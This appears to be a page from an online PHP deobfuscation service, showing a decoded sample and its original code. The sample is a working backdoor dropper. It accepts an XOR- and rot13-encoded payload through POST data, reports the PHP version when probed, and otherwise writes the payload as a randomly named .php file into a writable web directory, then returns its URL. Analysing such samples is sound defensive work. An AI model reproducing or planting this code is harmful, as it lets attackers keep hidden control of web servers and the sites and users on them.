Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $zofzfnow = "ocamnztzvbbsrrfd";$hfiex = "";foreach ($_POST as $gtbjk => $pgjbhqk){if..
Decoded Output download
<?php $zofzfnow = "ocamnztzvbbsrrfd";$hfiex = "";foreach ($_POST as $gtbjk => $pgjbhqk){if (strlen($gtbjk) == 16 and substr_count($pgjbhqk, "%") > 10){qrnjplfx($gtbjk, $pgjbhqk);}}function qrnjplfx($gtbjk, $yobpcjm){global $hfiex;$hfiex
= $gtbjk;$yobpcjm = str_split(rawurldecode(str_rot13($yobpcjm)));function zcbsnbohny($kjvllqnx, $gtbjk){global $zofzfnow, $hfiex;return $kjvllqnx ^ $zofzfnow[$gtbjk % strlen($zofzfnow)] ^ $hfiex[$gtbjk % strlen($hfiex)];}$yobpcjm = implo
de("", array_map("zcbsnbohny", array_values($yobpcjm), array_keys($yobpcjm)));$yobpcjm = @unserialize($yobpcjm);if (@is_array($yobpcjm)){$gtbjk = array_keys($yobpcjm);$yobpcjm = $yobpcjm[$gtbjk[0]];if ($yobpcjm === $gtbjk[0]){echo @seria
lize(Array('php' => @phpversion(), ));exit();}else{function dicmeqk($oruijqeslqir) {static $hdqwihcdge = array();$sakzzkjop = glob($oruijqeslqir . '/*', GLOB_ONLYDIR);if (count($sakzzkjop) > 0) {foreach ($sakzzkjop as $oruijqeslq){if (@i
s_writable($oruijqeslq)){$hdqwihcdge[] = $oruijqeslq;}}}foreach ($sakzzkjop as $oruijqeslqir) dicmeqk($oruijqeslqir);return $hdqwihcdge;}$pwoonj = $_SERVER["DOCUMENT_ROOT"];$sakzzkjop = dicmeqk($pwoonj);$gtbjk = array_rand($sakzzkjop);$u
flhzcy = $sakzzkjop[$gtbjk] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($uflhzcy, $yobpcjm);echo "http://" . $_SERVER["HTTP_HOST"] . substr($uflhzcy, strlen($pwoonj));exit();}}}
?>Did this file decode correctly?
Original Code
<?php $zofzfnow = "ocamnztzvbbsrrfd";$hfiex = "";foreach ($_POST as $gtbjk => $pgjbhqk){if (strlen($gtbjk) == 16 and substr_count($pgjbhqk, "%") > 10){qrnjplfx($gtbjk, $pgjbhqk);}}function qrnjplfx($gtbjk, $yobpcjm){global $hfiex;$hfiex
= $gtbjk;$yobpcjm = str_split(rawurldecode(str_rot13($yobpcjm)));function zcbsnbohny($kjvllqnx, $gtbjk){global $zofzfnow, $hfiex;return $kjvllqnx ^ $zofzfnow[$gtbjk % strlen($zofzfnow)] ^ $hfiex[$gtbjk % strlen($hfiex)];}$yobpcjm = implo
de("", array_map("zcbsnbohny", array_values($yobpcjm), array_keys($yobpcjm)));$yobpcjm = @unserialize($yobpcjm);if (@is_array($yobpcjm)){$gtbjk = array_keys($yobpcjm);$yobpcjm = $yobpcjm[$gtbjk[0]];if ($yobpcjm === $gtbjk[0]){echo @seria
lize(Array('php' => @phpversion(), ));exit();}else{function dicmeqk($oruijqeslqir) {static $hdqwihcdge = array();$sakzzkjop = glob($oruijqeslqir . '/*', GLOB_ONLYDIR);if (count($sakzzkjop) > 0) {foreach ($sakzzkjop as $oruijqeslq){if (@i
s_writable($oruijqeslq)){$hdqwihcdge[] = $oruijqeslq;}}}foreach ($sakzzkjop as $oruijqeslqir) dicmeqk($oruijqeslqir);return $hdqwihcdge;}$pwoonj = $_SERVER["DOCUMENT_ROOT"];$sakzzkjop = dicmeqk($pwoonj);$gtbjk = array_rand($sakzzkjop);$u
flhzcy = $sakzzkjop[$gtbjk] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($uflhzcy, $yobpcjm);echo "http://" . $_SERVER["HTTP_HOST"] . substr($uflhzcy, strlen($pwoonj));exit();}}}
Function Calls
| None |
Stats
| MD5 | f2f8ed31f48fcada0874e534fc49a726 |
| Eval Count | 0 |
| Decode Time | 103 ms |